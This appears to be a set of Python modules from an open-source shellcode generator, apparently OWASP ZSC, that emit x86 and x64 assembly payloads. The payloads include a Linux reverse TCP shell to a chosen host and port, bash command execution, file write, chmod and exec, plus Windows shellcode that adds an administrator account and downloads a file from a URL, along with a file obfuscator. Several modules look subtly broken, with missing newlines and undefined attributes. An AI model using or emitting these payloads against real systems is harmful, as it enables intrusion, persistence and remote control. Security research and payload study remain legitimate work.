class Module(base_module.BasePayload): command = base_module.OptString("", "Command to execute") def generate(self): payload = "push $0xb\n" payload += "pop %eax\n" payload += "cltd\n" payload += "push %edx\n" payload += stack.generate(self.command, '%ecx', 'string') payload += "mov %esp, %esi\n" payload += "push %edx\n" payload += "push $0x632d9090\n" payload += "pop %ecx\n" payload += "shr $0x10, %ecx\n" payload += "push %ecx\n" payload += "mov %esp, %ecx\n" payload += "push %edx\n" payload += "push $0x68\n" payload += "push $0x7361622f\n" payload += "push $0x6e69622f\n" payload += "mov %esp, %ebx\n" payload += "push %edx\n" payload += "push %edi\n" payload += "push %esi\n" payload += "push %ecx\n" payload += "push %ebx\n" payload += "mov %esp, %ecx\n" payload += "int $0x80\n" return payload def run(self): if not self.command: alert.error("A command is required.") return self.handle_generate(__name__)
class Module(base_module.BasePayload): lhost = base_module.OptIP("", "Listen IP address") lport = base_module.OptPort("", "Listen port") shell = base_module.OptString("/bin/sh", "Shell to execute") def generate(self): payload = "mov $1, %bl\n" payload += "push $0\n" payload += "push $1\n" payload += "push $2\n" payload += "mov %esp, %ecx\n" payload += "mov $0x66, %al\n" payload += "int $0x80\n" payload += f"push ${stack.ipv4_to_hex(self.lhost)}\n" # PUSH IP if self.lport < 256: payload += f"mov ${hex(self.lport)}, %bl\n" # MOV PORT else: payload += f"mov ${hex(self.lport)}, %bx\n" # MOV PORT payload += "push %bx\n" payload += "mov $0x2, %bl\n" payload += "push %bx\n" payload += "mov %esp, %ebx\n" payload += "push $0x10\n" payload += "push %ebx\n" payload += "push %eax\n" payload += "mov %esp, %ecx\n" payload += "mov $0x3, %bl\n" payload += "push %eax\n" payload += "mov $0x66, %al\n" payload += "int $0x80\n" payload += "pop %ebx\n" payload += "mov $0x2, %cl\n" payload += "mov $0x3f, %al\n" payload += "int $0x80\n" payload += "dec %ecx\n" payload += "mov $0x3f, %al\n" payload += "int $0x80\n" payload += stack.generate(self.shell, '%ebx', 'string') payload += "mov %esp, %ebx\n" payload += "xor %eax, %eax\n" payload += "push %eax\n" payload += "push %ebx\n" payload += "mov %esp, %ecx\n" payload += "xor %edx, %edx\n" payload += "mov $0xb, %al\n" payload += "int $0x80\n" return payload def run(self): if not self.lhost: alert.error("Listen address") return if not self.lport: alert.error("Listen port") return self.handle_generate(__name__)
class Module(base_module.BaseModule): file = base_module.OptString("", "File to obfuscate") type = base_module.OptString("", "File type") def run(self): if not self.file: alert.error("File option is required") return if not self.method: alert.error("An obfuscation method is required") return from owasp_zsc.libs import obfuscate import importlib try: module_path = obfuscate.__path__[0].split("owasp_zsc")[1].replace( "/", ".") module = importlib.import_module( f"owasp_zsc{module_path}.{self.type}.{self.method}") module = getattr(module, "ObfuscateModule")() if hasattr(module, "times"): setattr(module, "times", self.times ) # FIX submodule doesn't take new times from options alert.info("Getting file content") content = open(self.file).read() if not content.strip(): alert.error("File is empty!") return alert.info("Obfuscating file content") obfuscated_content = module.start(content) alert.info("Generating obfuscated script") f = open(self.file, "w") f.write(obfuscated_content) f.close() alert.info("Completed. Your file is obfuscated.") except AttributeError: traceback.print_exc() alert.error("Invalid module") except: traceback.print_exc()
class Module(base_module.BasePayload): # FIXME 1: program crashes when full path of file is too long # FIXME 2: file contents is not contents only target_file = base_module.OptString("", "File to write data") content = base_module.OptString("", "File's data") def generate(self): null = len(self.target_file) % 4 if null != 0: null = '' else: null = 'xor %ebx, %ebx\npush %ebx\n' payload = "push $0x5\n" payload += "pop %eax\n" payload += null payload += stack.generate(str(self.target_file), '%ebx', 'string') payload += "mov %esp, %ebx\n" payload += "push $0x4014141\n" payload += "pop %ecx\n" payload += "shr $0x10, %ecx\n" payload += "int $0x80\n" payload += "mov %eax, %ebx\n" payload += "push $0x4\n" payload += "pop %eax\n" payload += stack.generate(str(self.content), '%ecx', 'string') payload += "mov %esp, %ecx\n" payload += stack.generate(str(len(self.content)), '%edx', 'int') payload += "int $0x80\n" payload += "mov $0x1, %al\n" payload += "mov $0x1, %bl\n" payload += "int $0x80\n" return payload def run(self): if not self.target_file: alert.error("Target file is required") return if not self.content: alert.error("File's content is required") return self.handle_generate(__name__)
class Module(base_module.BasePayload): perm = base_module.OptString("", "Permission mask") # TODO improve descr file_dest = base_module.OptString("", "File Target") # TODO improve descr def generate(self): payload = "xor %%eax, %%eax" payload += "push %%eax" payload += stack.generate(self.file_dest, '%ebx', 'string') payload += "mov %%esp, %%edx" payload += stack.generate(self.perm, '%ecx', 'int') payload += "push %%edx" payload += "push $0xf" payload += "pop %%eax" payload += "push $0x2a" payload += "int $0x80" payload += "mov $0x01, %%al" payload += "mov $0x01, %%bl" payload += "int $0x80" return payload def run(self): print(self.generate())
class Module(base_module.BasePayload): target_file = base_module.OptString("", "Target file to change permission") permission = base_module.OptString("", "Permission mask (number)") def generate(self): payload = "push $0x0f\n" payload += "pop %eax\n" payload += stack.generate(self.permission, '%ecx', 'int') payload += stack.generate(self.target_file, '%ebx', 'string') payload += "mov %esp, %ebx\n" payload += "int $0x80\n" payload += "mov $0x01, %al\n" payload += "mov $0x01, %bl\n" payload += "int $0x80\n" return payload def run(self): if not self.target_file: alert.error("Target file and file's permissions are required") return if not self.permission: alert.error("Target's permission is required") return self.handle_generate(__name__)
class Module(base_module.BasePayload): file_dest = base_module.OptString("", "Destination file") def generate(self): payload = stack.generate(self.file_dest, '%ebx', 'string') payload += "mov %%esp, %%ebx" payload += "xor %%eax, %%eax" payload += "push %%eax" payload += "mov %%esp, %%edx" payload += "push %%ebx" payload += "mov %%esp, %%ecx" payload += "push %%edx" payload += "push %%ecx" payload += "push %%ebx" payload += "mov $0x3b, %%al" payload += "push $0x2a" payload += "int $0x80" payload += "mov $0x1, %%al" payload += "mov $0x1, %%bl" payload += "int $0x80" return payload
class Module(base_module.BasePayload): target_file = base_module.OptString("", "Target file to execute file") def generate(self): payload = "mov $0x46, %al\n" payload += "xor %ebx, %ebx\n" payload += "xor %ecx, %ecx\n" payload += "int $0x80\n" payload += stack.generate(self.target_file, '%ebx', 'string') payload += "mov %esp, %ebx\n" payload += "xor %eax, %eax\n" payload += "mov $0xb, %al\n" payload += "int $0x80\n" payload += "mov $0x1, %al\n" payload += "mov $0x1, %bl\n" payload += "int $0x80" return payload def run(self): if not self.target_file: alert.error("Target file is required") return self.handle_generate(__name__)
class Module(base_module.BasePayload): username = base_module.OptString("", "Username") password = base_module.OptString("", "Password") def generate(self, command, cvtcommand): payload = "xor %ecx, %ecx" payload += "mov %fs:0x30(%ecx), %eax" payload += "mov 0xc(%eax), %eax" payload += "mov 0x14(%eax), %esi" payload += "lods %ds:(%esi), %eax" payload += "xchg %eax, %esi" payload += "lods %ds:(%esi), %eax" payload += "mov 0x10(%eax), %ebx" payload += "mov 0x3c(%ebx), %edx" payload += "add %ebx, %edx" payload += "mov 0x78(%edx), %edx" payload += "add %ebx, %edx" payload += "mov 0x20(%edx), %esi" payload += "add %ebx, %esi" payload += "xor %ecx, %ecx" payload += "inc %ecx" payload += "lods %ds:(%esi), %eax" payload += "add %ebx, %eax" payload += "cmpl $0x50746547, (%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x41636f72, 0x4(%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x65726464, 0x8(%eax)" payload += "jne 23 <.text+0x23>" payload += "mov 0x24(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 2), %cx" payload += "dec %ecx" payload += "mov 0x1c(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 4), %edx" payload += "add %ebx, %edx" payload += "push %ebx" payload += "push %edx" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "mov $0x61636578, %ecx" payload += "push %ecx" payload += "subl $0x61, 0x3(%esp)" payload += "push $0x456e6957" payload += "push %esp" payload += "push %ebx" payload += "call *%edx" payload += "add $0x8, %esp" payload += "pop %ecx" payload += "push %eax" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += command payload += "xor %ebx, %ebx" payload += "mov %esp, %ebx" payload += "xor %ecx, %ecx" payload += "inc %ecx" payload += "push %ecx" payload += "push %ebx" payload += "call *%eax" payload += f"add ${cvtcommand}, %esp" payload += "pop %edx" payload += "pop %ebx" payload += "xor %ecx, %ecx" payload += "mov $0x61737365, %ecx" payload += "push %ecx" payload += "subl $0x61, 0x3(%esp)" payload += "push $0x636f7250" payload += "push $0x74697845" payload += "push %esp" payload += "push %ebx" payload += "call *%edx" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "call *%eax" return payload def run(self): command = f"cmd.exe /c net user {self.username} {self.password} /add && " \ f"net localgroup administrators {self.username} /add " print( self.generate(stack.generate(command, "%ecx", "string"), hex(int(8 + 4 * (ceil(len(command) / float(4)))))))
class Module(base_module.BasePayload): target_file = base_module.OptString("", "Target file to execute") def generate(self): payload = "xor %ecx, %ecx\n" payload += "mov %fs:0x30(%ecx), %eax\n" payload += "mov 0xc(%eax), %eax\n" payload += "mov 0x14(%eax), %esi\n" payload += "lods %ds:(%esi), %eax\n" payload += "xchg %eax, %esi\n" payload += "lods %ds:(%esi), %eax\n" payload += "mov 0x10(%eax), %ebx\n" payload += "mov 0x3c(%ebx), %edx\n" payload += "add %ebx, %edx\n" payload += "mov 0x78(%edx), %edx\n" payload += "add %ebx, %edx\n" payload += "mov 0x20(%edx), %esi\n" payload += "add %ebx, %esi\n" payload += "xor %ecx, %ecx\n" payload += "inc %ecx\n" payload += "lods %ds:(%esi), %eax\n" payload += "add %ebx, %eax\n" payload += "cmpl $0x50746547, (%eax)\n" payload += "jne 23 <.text+0x23>\n" payload += "cmpl $0x41636f72, 0x4(%eax)\n" payload += "jne 23 <.text+0x23>\n" payload += "cmpl $0x65726464, 0x8(%eax)\n" payload += "jne 23 <.text+0x23>\n" payload += "mov 0x24(%edx), %esi\n" payload += "add %ebx, %esi\n" payload += "mov (%esi, %ecx, 2), %cx\n" payload += "dec %ecx\n" payload += "mov 0x1c(%edx), %esi\n" payload += "add %ebx, %esi\n" payload += "mov (%esi, %ecx, 4), %edx\n" payload += "add %ebx, %edx\n" payload += "push %ebx\n" payload += "push %edx\n" payload += "xor %ecx, %ecx\n" payload += "push %ecx\n" payload += "mov $0x61636578, %ecx\n" payload += "push %ecx\n" payload += "subl $0x61, 0x3(%esp)\n" payload += "push $0x456e6957\n" payload += "push %esp\n" payload += "push %ebx\n" payload += "call *%edx\n" payload += "add $0x8, %esp\n" payload += "pop %ecx\n" payload += "push %eax\n" payload += "xor %ecx, %ecx\n" payload += "push %ecx\n" payload += stack.generate(self.target_file, "%ecx", "string") payload += "xor %ebx, %ebx\n" payload += "mov %esp, %ebx\n" payload += "xor %ecx, %ecx\n" payload += "inc %ecx\n" payload += "push %ecx\n" payload += "push %ebx\n" payload += "call *%eax\n" payload += f"add ${hex(int(8 + 4 * (ceil(len(self.target_file) / float(4)))))}, %esp\n" payload += "pop %edx\n" payload += "pop %ebx\n" payload += "xor %ecx, %ecx\n" payload += "mov $0x61737365, %ecx\n" payload += "push %ecx\n" payload += "subl $0x61, 0x3(%esp)\n" payload += "push $0x636f7250\n" payload += "push $0x74697845\n" payload += "push %esp\n" payload += "push %ebx\n" payload += "call *%edx\n" payload += "xor %ecx, %ecx\n" payload += "push %ecx\n" payload += "call *%eax\n" return payload def run(self): if not self.target_file: alert.error("Target file and file's permissions are required") return try: import traceback self.handle_generate(__name__) except: traceback.print_exc()
class Module(base_module.BasePayload): file_dest = base_module.OptString("", "File dest") # TODO improve descr def generate(self): payload = "sub $0x20, %rsp" payload += "and $0xfffffffffffffff0, %rsp" payload += "mov %gs:0x60, %r12" payload += "mov 0x18(%r12), %r12" payload += "mov 0x20(%r12), %r12" payload += "mov (%r12), %r12" payload += "mov 0x20(%r12), %r15" payload += "mov (%r12), %r12" payload += "mov 0x20(%r12), %r12" payload += "mov $0xe8afe98, %rdx" payload += "mov %r12, %rcx" payload += "mov %r12, %r12" payload += "callq 0x401067" payload += "jmp 0x401059" payload += "pop %rcx" payload += "mov $0x1, %edx" payload += "callq *%rax" payload += "mov $0x2d3fcd70, %edx" payload += "mov %r15, %rcx" payload += "callq 0x401067" payload += "xor %rcx, %rcx" payload += "callq *%rax" payload += "callq 0x40103f" payload += "movslq 0x6c(%rcx), %esp" payload += "movslq (%rsi), %ebp" payload += "gs js 0x4010cb" payload += "add %cl, -0x77(%rcx)" payload += "int $0x67" payload += "mov 0x3c(%r13), %eax" payload += "mov 0x88(%r13d, %eax, 1), %r14d" payload += "add %r13d, %r14d" payload += "mov 0x18(%r14d), %r10d" payload += "mov 0x20(%r14d), %ebx" payload += "add %r13d, %ebx" payload += "jecxz 0x4010ca" payload += "dec %r10d" payload += "mov (%ebx, %r10d, 4), %esi" payload += "add %r13d, %esi" payload += "xor %edi, %edi" payload += "xor %eax, %eax" payload += "cld" payload += "lodsb %ds:(%rsi), %al" payload += "test %al, %al" payload += "je 0x4010a7" payload += "ror $0xd, %edi" payload += "add %eax, %edi" payload += "jmp 0x40109b" payload += "cmp %edx, %edi" payload += "jne 0x401088" payload += "mov 0x24(%r14d), %ebx" payload += "add %r13d, %ebx" payload += "xor %ecx, %ecx" payload += "mov (%ebx, %r10d, 2), %cx" payload += "mov 0x1c(%r14d), %ebx" payload += "add %r13d, %ebx" payload += "mov (%ebx, %ecx, 4), %eax" payload += "add %r13d, %eax" payload += "retq" payload += "add %al, (%rax)" payload += "add %al, (%rax)" return payload def run(self): print(self.generate())
class Module(base_module.BasePayload): url = base_module.OptString("", "URL to download") # TODO improve descr file_dest = base_module.OptString("", "File name") # TODO improve descr def generate(self): payload = "xor %ecx, %ecx" payload += "mov %fs:0x30(%ecx), %eax" payload += "mov 0xc(%eax), %eax" payload += "mov 0x14(%eax), %esi" payload += "lods %ds:(%esi), %eax" payload += "xchg %eax, %esi" payload += "lods %ds:(%esi), %eax" payload += "mov 0x10(%eax), %ebx" payload += "mov 0x3c(%ebx), %edx" payload += "add %ebx, %edx" payload += "mov 0x78(%edx), %edx" payload += "add %ebx, %edx" payload += "mov 0x20(%edx), %esi" payload += "add %ebx, %esi" payload += "xor %ecx, %ecx" payload += "inc %ecx" payload += "lods %ds:(%esi), %eax" payload += "add %ebx, %eax" payload += "cmpl $0x50746547, (%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x41636f72, 0x4(%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x65726464, 0x8(%eax)" payload += "jne 23 <.text+0x23>" payload += "mov 0x24(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 2), %cx" payload += "dec %ecx" payload += "mov 0x1c(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 4), %edx" payload += "add %ebx, %edx" payload += "xor %esi, %esi" payload += "mov %edx, %esi" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "push $0x41797261" payload += "push $0x7262694c" payload += "push $0x64616f4c" payload += "push %esp" payload += "push %ebx" payload += "call *%edx" payload += "xor %ecx, %ecx" payload += "mov $0x6c6c, %cx" payload += "push %ecx" payload += "push $0x642e6e6f" payload += "push $0x6d6c7275" payload += "push %esp" payload += "call *%eax" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "mov $0x4165, %cx" payload += "push %ecx" payload += "push $0x6c69466f" payload += "push $0x5464616f" payload += "push $0x6c6e776f" payload += "push $0x444c5255" payload += "mov %esp, %ecx" payload += "push %ecx" payload += "push %eax" payload += "call *%esi" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += stack.generate(self.url, "%ecx", "string") payload += "xor %edi, %edi" payload += "mov %esp, %edi" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += stack.generate(self.filename, "%ecx", "string") payload += "xor %edx, %edx" payload += "mov %esp, %edx" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "push %ecx" payload += "push %edx" payload += "push %edi" payload += "push %ecx" payload += "call *%eax" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "push $0x73736590" payload += "pop %ecx" payload += "shr $0x8, %ecx" payload += "push %ecx" payload += "push $0x636f7250" payload += "push $0x74697845" payload += "push %esp" payload += "push %ebx" payload += "call *%esi" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "call *%eax" return payload def run(self): print(self.generate())
class Module(base_module.BasePayload): file_dest = base_module.OptString("", "File Destination") data = base_module.OptString("", "File data") def generate(self, command): payload = "xor %ecx, %ecx" payload += "mov %fs:0x30(%ecx), %eax" payload += "mov 0xc(%eax), %eax" payload += "mov 0x14(%eax), %esi" payload += "lods %ds:(%esi), %eax" payload += "xchg %eax, %esi" payload += "lods %ds:(%esi), %eax" payload += "mov 0x10(%eax), %ebx" payload += "mov 0x3c(%ebx), %edx" payload += "add %ebx, %edx" payload += "mov 0x78(%edx), %edx" payload += "add %ebx, %edx" payload += "mov 0x20(%edx), %esi" payload += "add %ebx, %esi" payload += "xor %ecx, %ecx" payload += "inc %ecx" payload += "lods %ds:(%esi), %eax" payload += "add %ebx, %eax" payload += "cmpl $0x50746547, (%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x41636f72, 0x4(%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x65726464, 0x8(%eax)" payload += "jne 23 <.text+0x23>" payload += "mov 0x24(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 2), %cx" payload += "dec %ecx" payload += "mov 0x1c(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 4), %edx" payload += "add %ebx, %edx" payload += "xor %esi, %esi" payload += "mov %edx, %esi" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "push $0x41797261" payload += "push $0x7262694c" payload += "push $0x64616f4c" payload += "push %esp" payload += "push %ebx" payload += "call *%edx" payload += "xor %ecx, %ecx" payload += "mov $0x6c6c, %cx" payload += "push %ecx" payload += "push $0x642e7472" payload += "push $0x6376736d" payload += "push %esp" payload += "call *%eax" payload += "xor %edi, %edi" payload += "mov %eax, %edi" payload += "xor %edx, %edx" payload += "push %edx" payload += "mov $0x6d65, %dx" payload += "push %edx" payload += "push $0x74737973" payload += "mov %esp, %ecx" payload += "push %ecx" payload += "push %edi" payload += "xor %edx, %edx" payload += "mov %esi, %edx" payload += "call *%edx" payload += "xor %ecx, %ecx" payload += command payload += "push %esp" payload += "call *%eax" payload += "xor %edx, %edx" payload += "push %edx" payload += "push $0x74697865" payload += "mov %esp, %ecx" payload += "push %ecx" payload += "push %edi" payload += "call *%esi" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "call *%eax" return payload def run(self): command = stack.generate(f"echo {self.data} > {self.file_dest}", "%ecx", "string") print(self.generate(command))
class Module(base_module.BasePayload): dest_file = base_module.OptString("notepad.exe", "File to execute") def generate(self, dest): payload = "bits 64" payload += "section .text" payload += "global start" payload += "" payload += "start:" payload += ";get dll base addresses" payload += " sub rsp, 20h ;reserve stack space for called functions" payload += " and rsp, 0fffffffffffffff0h ;make sure stack 16-byte aligned " payload += " " payload += " mov r12, [gs:60h] ;peb" payload += " mov r12, [r12 + 0x18] ;Peb --> LDR" payload += " mov r12, [r12 + 0x20] ;Peb.Ldr.InMemoryOrderModuleList" payload += " mov r12, [r12] ;2st entry" payload += " mov r15, [r12 + 0x20] ;ntdll.dll base address!" payload += " mov r12, [r12] ;3nd entry" payload += " mov r12, [r12 + 0x20] ;kernel32.dll base address!" payload += " " payload += ";find address of winexec from kernel32.dll which was found above. " payload += " mov rdx, 0xe8afe98 ; hash of winexec given to rdx " payload += " mov rcx, r12 ; rcx has dll address now" payload += " mov r12, r12" payload += " call GetProcessAddress ; give arguments in rdx and rcx and get rax back with winexex" payload += " " payload += "; the winexec call" payload += " jmp GetProgramName" payload += "" payload += "ExecProgram:" payload += " pop rcx ;rcx has the handle to the calc.exe string (1st argument)" payload += " mov edx, 1" payload += " call rax" payload += " " payload += ";ExitProcess" payload += " mov rdx, 0x2d3fcd70 " payload += " mov rcx, r15" payload += " call GetProcessAddress" payload += " xor rcx, rcx ;uExitCode" payload += " call rax " payload += "" payload += ";get program name" payload += "GetProgramName:" payload += " call ExecProgram" payload += f" db {dest}" payload += " db 0x00 ; null terminated string" payload += "" payload += ";Hashing section to resolve a function address " payload += "GetProcessAddress: " payload += " mov r13, rcx ;base address of dll loaded - rdx has winexec, rcx has kernel32 addr" payload += " mov eax, [r13d + 0x3c] ;skip DOS header and go to PE header" payload += " mov r14d, [r13d + eax + 0x88] ;0x88 offset from the PE header == the export table. " payload += " add r14d, r13d ;make the export table an absolute base address and put it in r14d." payload += "" payload += " mov r10d, [r14d + 0x18] ;go into the export table and get the numberOfNames " payload += " mov ebx, [r14d + 0x20] ;get the AddressOfNames offset. " payload += " add ebx, r13d ;AddressofNames base. " payload += " " payload += "find_function_loop: " payload += " jecxz find_function_finished ; jump short if ecx == zero. nothing found " payload += " dec r10d ;dec ECX by one for the loop" payload += " mov esi, [ebx + r10d * 4] ;get a name to from the export table. " payload += " add esi, r13d ;esi == now the current name to search on. " payload += " " payload += "find_hashes:" payload += " xor edi, edi" payload += " xor eax, eax" payload += " cld" payload += "" payload += ";this block computes the hash for whatever == at esi " payload += "continue_hashing: " payload += " lodsb ;load byte at ds:esi to al" payload += " test al, al ;is the end of string resarched?" payload += " jz compute_hash_finished" payload += " ror dword edi, 0xd ;ROR13 for hash calculation!" payload += " add edi, eax ; edi has the hash from the hash calculation" payload += " jmp continue_hashing" payload += "" payload += "; this block checks the hash and then gives back the function loaded at eax " payload += "compute_hash_finished:" payload += " cmp edi, edx ;edx has the function hash (rdx , rcx was passed on from above)" payload += " jnz find_function_loop ;didn't match, keep trying!" payload += " mov ebx, [r14d + 0x24] ;put the address of the ordinal table and put it in ebx. " payload += " add ebx, r13d ;absolute address" payload += " xor ecx, ecx ;ensure ecx == 0'd. " payload += " mov cx, [ebx + 2 * r10d] ;ordinal = 2 bytes. Get the current ordinal and put it in cx." \ " ECX was our counter for which # we were in. " payload += " mov ebx, [r14d + 0x1c] ;extract the address table offset" payload += " add ebx, r13d ;put absolute address in EBX." payload += " mov eax, [ebx + 4 * ecx] ;relative address" payload += " add eax, r13d ; eax has the required function given by the hash in rcx" payload += "" payload += "" payload += "find_function_finished:" payload += " ret" return payload def run(self): file_dest = stack.generate(self.dest_file, "%ecx", "string") print(self.generate(file_dest))
class Module(base_module.BasePayload): dirname = base_module.OptString("", "Dir name") # TODO improve descr def generate(self): payload = "xor %ecx, %ecx" payload += "mov %fs:0x30(%ecx), %eax" payload += "mov 0xc(%eax), %eax" payload += "mov 0x14(%eax), %esi" payload += "lods %ds:(%esi), %eax" payload += "xchg %eax, %esi" payload += "lods %ds:(%esi), %eax" payload += "mov 0x10(%eax), %ebx" payload += "mov 0x3c(%ebx), %edx" payload += "add %ebx, %edx" payload += "mov 0x78(%edx), %edx" payload += "add %ebx, %edx" payload += "mov 0x20(%edx), %esi" payload += "add %ebx, %esi" payload += "xor %ecx, %ecx" payload += "inc %ecx" payload += "lods %ds:(%esi), %eax" payload += "add %ebx, %eax" payload += "cmpl $0x50746547, (%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x41636f72, 0x4(%eax)" payload += "jne 23 <.text+0x23>" payload += "cmpl $0x65726464, 0x8(%eax)" payload += "jne 23 <.text+0x23>" payload += "mov 0x24(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 2), %cx" payload += "dec %ecx" payload += "mov 0x1c(%edx), %esi" payload += "add %ebx, %esi" payload += "mov (%esi, %ecx, 4), %edx" payload += "add %ebx, %edx" payload += "push %ebx" payload += "push %edx" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "push $0x4179726f" payload += "push $0x74636572" payload += "push $0x69446574" payload += "push $0x61657243" payload += "push %esp" payload += "push %ebx" payload += "call *%edx" payload += "add $0x10, %esp" payload += "pop %ecx" payload += "push %eax" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += stack.generate(self.dirname, "%ecx", "string") payload += "xor %ebx, %ebx" payload += "mov %esp, %ebx" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "push %ebx" payload += "call *%eax" payload += f"add ${hex(int(8 + 4 * (ceil(len(self.dirname) / float(4)))))}, %esp" payload += "pop %edx" payload += "pop %ebx" payload += "xor %ecx, %ecx" payload += "mov $0x61737365, %ecx" payload += "push %ecx" payload += "subl $0x61, 0x3(%esp)" payload += "push $0x636f7250" payload += "push $0x74697845" payload += "push %esp" payload += "push %ebx" payload += "call *%edx" payload += "xor %ecx, %ecx" payload += "push %ecx" payload += "call *%eax" return payload def run(self): print(self.generate())
class Obfuscator(base_module.BaseModule): method = base_module.OptString("", "Obfuscate method")